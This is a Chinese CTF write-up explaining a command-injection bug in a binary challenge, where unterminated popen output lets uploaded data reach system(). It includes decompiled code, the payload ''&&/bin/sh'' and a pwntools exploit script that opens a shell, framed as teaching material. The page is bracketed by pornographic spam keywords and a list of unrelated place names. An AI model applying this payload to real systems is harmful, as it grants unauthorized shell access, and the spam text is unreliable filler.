最新国产好看的视频,伊人天堂AV在线,国产Aaaaaa视频,蜜臀视频在线观看一区,人妻av色图,密臀久久久精品影片,青青视频免费观看毛片,久草在线观看视,国产三级精品色情在线

關(guān)于讀取popen輸出結(jié)果時未截斷字符串導(dǎo)致的命令行注入詳解

 更新時間:2018年03月12日 10:53:25   作者:holing  
這篇文章主要給大家介紹了關(guān)于讀取popen輸出結(jié)果時未截斷字符串導(dǎo)致的命令行注入的相關(guān)資料,文中通過圖文及示例代碼介紹的非常詳細(xì),對大家的學(xué)習(xí)或者工作具有一定的參考學(xué)習(xí)價值,需要的朋友們下面隨著小編來一起學(xué)習(xí)學(xué)習(xí)吧。

0x00 前言

這種命令行注入在pwn中出現(xiàn)的比較少,所以記錄分享一下。

0x01 命令行注入介紹

熟悉web安全的話就知道,如果對特殊字符過濾不當(dāng),會引發(fā)sql注入或者xss等安全漏洞。其中,命令行注入較為嚴(yán)重,因為可以直接拿到漏洞程序當(dāng)前權(quán)限的OSshell。

然而,命令行注入不僅在web中會出現(xiàn),在C語言程序中,也會出現(xiàn)命令行注入的漏洞。比方說這道pwn題,就是調(diào)用system時,沒有對輸入數(shù)據(jù)進(jìn)行\(zhòng)0截斷以及對特殊字符處理不當(dāng)而導(dǎo)致的。

命令行注入相對于其他二進(jìn)制漏洞相比利用比較簡單,比方說這道題,舉個例子:

sprintf(&s, "du -sh lib/'%s'", v6);
system(&s);

其中設(shè)計初衷,v6應(yīng)當(dāng)是一個合法的文件名。但是如果攻擊者惡意操控v6,比方說,讓v6為:'&&/bin/sh'
進(jìn)行sprintf拼接后,system所執(zhí)行的命令為:

du -sh lib/''&&/bin/sh''

這里有兩個linux命令行的知識:

&&,這是拼接兩個命令,如果我們執(zhí)行 command1&&command2,那么等價于先執(zhí)行command1在執(zhí)行command2。其中命令跟&&之間不必加空格。

在命令后不加空格的''(兩個單引號)會被忽略,比如ls''等價于ls,/bin/sh''等價于/bin/sh,du -sh lib/''等價于du -sh lib/(即,實際傳進(jìn)去的參數(shù)是lib/不是lib/'')

所以,執(zhí)行上面的命令,相當(dāng)于先執(zhí)行了

du -sh lib/

再執(zhí)行

/bin/sh

所以,可以getshell。

0x02 題目

題目所給的是一個library的服務(wù),可以上傳book,查看books,清除books。其中,book存放在lib/文件夾中。

0x03 漏洞點

char *list_books()
{
 FILE *v0; // eax
 char *result; // eax
 char s; // [esp+4h] [ebp-C14h]
 char ptr; // [esp+804h] [ebp-414h]
 char *v4; // [esp+C04h] [ebp-14h]
 FILE *stream; // [esp+C08h] [ebp-10h]
 char *v6; // [esp+C0Ch] [ebp-Ch]
 v0 = popen("ls lib/", "r");
 stream = v0;
 result = (char *)fread(&ptr, 1u, 0x400u, v0);
 v4 = result;
 if ( result )
 {
 v6 = strtok(&ptr, delims);
 result = (char *)send("Book list:\nSize\tE-book\n");
 while ( v6 )
 {
 sprintf(&s, "du -sh lib/'%s'", v6);
 //很明顯,這里存在可能的命令行注入
 system(&s);
 fflush(stdout);
 result = strtok(0, delims);
 v6 = result;
 }
 }
 return result;

其中l(wèi)ist_books代碼如上,v6來自fread從popen中的返回結(jié)果。他本來想做的是輸出每個文件的大小,但是fread后沒有用\0截斷。所以調(diào)用strtok時,可能會讀到fread后面的垃圾數(shù)據(jù)(當(dāng)然如果可以操控的話就不是垃圾數(shù)據(jù)了)

sprintf的棧溢出會比較難利用,因為&s比較大,有0x800,而v6是從&ptr里面strtok出來的,而&ptr更小,只有0x400。所以應(yīng)該沒法很好的利用。

0x04 操控垃圾數(shù)據(jù)

那么,我們怎么去操控&ptr中的垃圾數(shù)據(jù)呢?這個時候看看另外一個函數(shù)

int upload_book()
{
 char *v1; // eax
 int v2; // eax
 char buf[1024]; // [esp+Ch] [ebp-42Ch]
 char s[20]; // [esp+40Ch] [ebp-2Ch]
 FILE *stream; // [esp+420h] [ebp-18h]
 char *dest; // [esp+424h] [ebp-14h]
 size_t v7; // [esp+428h] [ebp-10h]
 int v8; // [esp+42Ch] [ebp-Ch]
 if ( book_counter > 10 )
 return send("too many books\n");
 send("Book filename: ");
 v8 = __isoc99_scanf("%20s", s);
 if ( v8 != 1 )
 return send("Wrong title format\n");
 v7 = strlen(s);
 if ( strcmp(&s[v7 - 3], ".bk") )
 return send("The name needs to end with '.bk'\n");
 send("e-book contents: \n");
 read(0, buf, 0x400u);
 if ( *(_DWORD *)buf != 'BBBB' )
 return send("Not an e-book\naborting...\n");
 v1 = (char *)malloc(0x18u);
 dest = v1;
 *(_DWORD *)v1 = 0x2F62696C;
 v1[4] = 0;
 strcat(dest, s);
 stream = fopen(dest, "w");
 if ( !stream )
 return send("Bad book filename\n");
 v2 = book_counter++;
 books[v2] = dest;
 fwrite(buf, 1u, 0x400u, stream);
 return fclose(stream);
}

其中,這在棧中也會分配0x400個字節(jié),并且我們可以寫入。

并且,調(diào)用完這個函數(shù)之后,清除??臻g時,只是簡單地add esp,xxx,并不會清空其中數(shù)據(jù)。然后,再調(diào)用存在命令行注入的函數(shù)并分配棧空間時,也只是單純地sub esp,xxx,也不會清空數(shù)據(jù)。在C語言中,如果此時對不賦值的局部變量直接訪問的話,是UB行為。但是,從二進(jìn)制安全的角度看的話,便是可利用的點了。其中這道題,本身就是一個局部字符串讀取后未截斷而造成的UB,然而我們便可以利用這個。

那么來試試:

很明顯,BBBB123456789123456789123456789123456789AAAA的后面89123456789AAAA被拼接到du -sh lib/'%s'中了

動態(tài)調(diào)試看一下的話

第一次在system停下

第二次在system停下

所以很明顯,只要把89123456789AAAA改成

'&&/bin/sh'\x00

就可以getshell了。如前面所說。

其中,\x00是我們自己手動截斷,不然strtok還會繼續(xù)往后讀。

所以最后exp

#BBBB1234567891234567891234567'&&/bin/sh'
g_local = True
 
from pwn import *
 
if g_local:
 sh=process("./library")
else:
 sh=remote("xxxx",1234)
 
 
def upload_book(filename, content):
 filename += ".bk"
 sh.send("1\n")
 sh.recvuntil("Book filename: ")
 print filename
 sh.send(filename + "\n")
 sh.recvuntil("e-book contents: \n")
 sh.send(content)
 sh.recvuntil("Enter command: ")
 
def list_books_and_shell():
 sh.send("2\n")
 sh.interactive()
 
upload_book("1", "BBBB1234567891234567891234567\'&&/bin/sh\'\x00")
list_books_and_shell()

0x05 后言

還有一點要注意,pwndbg好像會默認(rèn)在fork時跟子進(jìn)程,所以要在~/.gdbinit的最后面(加載pwndbg之后)加上set follow-fork-mode parent。并且,&&與命令之間不能加空格。因為他strtok是通過空格和換行分?jǐn)嘧址?,加了空格我們的payload就會被strtok分割開。

總結(jié)

以上就是這篇文章的全部內(nèi)容了,希望本文的內(nèi)容對大家的學(xué)習(xí)或者工作具有一定的參考學(xué)習(xí)價值,如果有疑問大家可以留言交流,謝謝大家對腳本之家的支持。

相關(guān)文章

  • C++連接mysql的方法(直接調(diào)用C-API)

    C++連接mysql的方法(直接調(diào)用C-API)

    首先安裝mysql,點完全安裝,才能在在安裝目錄include找到相應(yīng)的頭文件,注意,是完全安裝,需要的朋友可以參考下
    2017-06-06
  • C++如何向Lambda傳遞參數(shù)與捕獲

    C++如何向Lambda傳遞參數(shù)與捕獲

    文章介紹了C++中向Lambda表達(dá)式傳遞參數(shù)和使用捕獲列表的基本規(guī)則和示例,參數(shù)傳遞要求嚴(yán)格匹配類型和數(shù)量,而捕獲列表允許Lambda訪問外部變量,并可以按值或引用捕獲,文章還討論了捕獲的陷阱和解決方案,以及參數(shù)傳遞與捕獲列表的區(qū)別和應(yīng)用場景,感興趣的朋友一起看看吧
    2025-03-03
  • include包含頭文件的語句中,雙引號和尖括號的區(qū)別(詳解)

    include包含頭文件的語句中,雙引號和尖括號的區(qū)別(詳解)

    下面小編就為大家?guī)硪黄猧nclude包含頭文件的語句中,雙引號和尖括號的區(qū)別(詳解)。小編覺得挺不錯的,現(xiàn)在就分享給大家,也給大家做個參考。一起跟隨小編過來看看吧
    2017-07-07
  • QT的QWebEngineView類知識點詳細(xì)介紹

    QT的QWebEngineView類知識點詳細(xì)介紹

    QWebEngineView是Qt框架中的組件,基于Chromium內(nèi)核,支持HTML5、CSS3、JavaScript等Web技術(shù),適用于嵌入網(wǎng)頁內(nèi)容到Qt應(yīng)用程序,它提供了豐富的接口如加載、導(dǎo)航、與JavaScript交互等,并支持信號槽機(jī)制處理各種網(wǎng)頁事件,文中通過代碼介紹的非常詳細(xì),需要的朋友可以參考下
    2024-10-10
  • C語言數(shù)據(jù)結(jié)構(gòu)之鏈隊列的基本操作

    C語言數(shù)據(jù)結(jié)構(gòu)之鏈隊列的基本操作

    這篇文章主要為大家介紹了C語言之鏈隊列的基本操作,具有一定的參考價值,感興趣的小伙伴們可以參考一下,希望能夠給你帶來幫助
    2021-12-12
  • VS2019安裝cbd調(diào)試器的實現(xiàn)步驟

    VS2019安裝cbd調(diào)試器的實現(xiàn)步驟

    本文主要介紹了VS2019安裝cbd調(diào)試器的實現(xiàn)步驟,文中通過示例代碼介紹的非常詳細(xì),對大家的學(xué)習(xí)或者工作具有一定的參考學(xué)習(xí)價值,需要的朋友們下面隨著小編來一起學(xué)習(xí)學(xué)習(xí)吧
    2023-12-12
  • C語言實現(xiàn)矩陣翻轉(zhuǎn)(上下翻轉(zhuǎn)、左右翻轉(zhuǎn))

    C語言實現(xiàn)矩陣翻轉(zhuǎn)(上下翻轉(zhuǎn)、左右翻轉(zhuǎn))

    這篇文章主要介紹了C語言實現(xiàn)矩陣翻轉(zhuǎn)(上下翻轉(zhuǎn)、左右翻轉(zhuǎn))的相關(guān)資料,需要的朋友可以參考下
    2017-05-05
  • c語言基于stdarg.h的可變參數(shù)函數(shù)的用法

    c語言基于stdarg.h的可變參數(shù)函數(shù)的用法

    本篇文章主要介紹了c語言基于stdarg.h的可變參數(shù)函數(shù)的用法,詳細(xì)的介紹了可變參數(shù)函數(shù)的詳細(xì)用法和源碼實例,有興趣的可以了解一下
    2017-07-07
  • C語言二維數(shù)組指針的概念及使用

    C語言二維數(shù)組指針的概念及使用

    C語言中的二維數(shù)組是按行排列的,也就是先存放a[0]行,再存放a[1]行,最后存放a[2]行;每行中的4個元素也是依次存放。數(shù)組a為int類型,每個元素占用4個字節(jié),整個數(shù)組共占用48個字節(jié)
    2023-02-02
  • 關(guān)于VS2022不能使用<bits/stdc++.h>的解決方案(萬能頭文件)

    關(guān)于VS2022不能使用<bits/stdc++.h>的解決方案(萬能頭文件)

    #include<bits/stdc++.h>包含了目前 C++ 所包含的所有頭文件,又稱萬能頭文件,那么如何在VS2022中使用萬能頭呢?下面小編給大家代理了關(guān)于VS2022不能使用<bits/stdc++.h>的解決方案(萬能頭文件),感興趣的朋友一起看看吧
    2022-03-03

最新評論

勐海县| 云霄县| 班戈县| 济源市| 永嘉县| 日喀则市| 宝坻区| 康马县| 通渭县| 大名县| 洛阳市| 义乌市| 克什克腾旗| 从江县| 河北省| 四川省| 兴山县| 铁岭市| 兴义市| 云浮市| 南京市| 德阳市| 泰宁县| 南雄市| 涞源县| 陵川县| 吐鲁番市| 安泽县| 寿阳县| 泽州县| 龙胜| 陇南市| 霸州市| 剑河县| 和田县| 汝州市| 儋州市| 石阡县| 竹山县| 日喀则市| 天津市|